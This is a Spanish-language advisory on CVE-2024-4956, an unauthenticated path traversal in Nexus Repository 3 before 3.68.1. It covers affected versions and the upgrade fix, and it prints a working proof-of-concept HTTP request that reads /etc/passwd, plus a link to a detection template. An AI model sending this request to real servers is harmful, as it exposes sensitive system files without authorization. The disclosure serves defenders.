
Path Traversal no autenticado en Nexus Repository 3
Nexus Repository Manager es un administrador de repositorios que organiza, almacena y distribuye artefactos necesarios para el desarrollo.
Se ha descubierto una vulnerabilidad de path traversal en Nexus Repository 3, en versiones anteriores a la 3.68.1. Esta vulnerabilidad permite a un atacante manipular una URL para descargar archivos del sistema fuera del alcance de la aplicación Nexus Repository, sin necesidad de autenticación alguna. Esto representa un riesgo significativo, ya que puede exponer archivos sensibles del sistema y potencialmente comprometer la seguridad del entorno donde está instalado Nexus Repository.
Se recomienda actualizar Nexus Repository a la versión 3.68.1 o posterior lo antes posible para mitigar esta vulnerabilidad.
Para más información y detalles técnicos sobre la vulnerabilidad, consulte el siguiente enlace:
Referencias:
La vulnerabilidad afecta a las versiones 3.0 a 3.68.0 de Sonatype Nexus Repository Manager.
Actualizar Nexus Repository es el enfoque recomendado para eliminar esta vulnerabilidad. Sin embargo, existen opciones de mitigación inmediata para implementaciones que no puedan actualizarse de inmediato:
Referencias:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Con el PoC anterior, es posible ver el archivo /etc/passwd siendo accedido:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml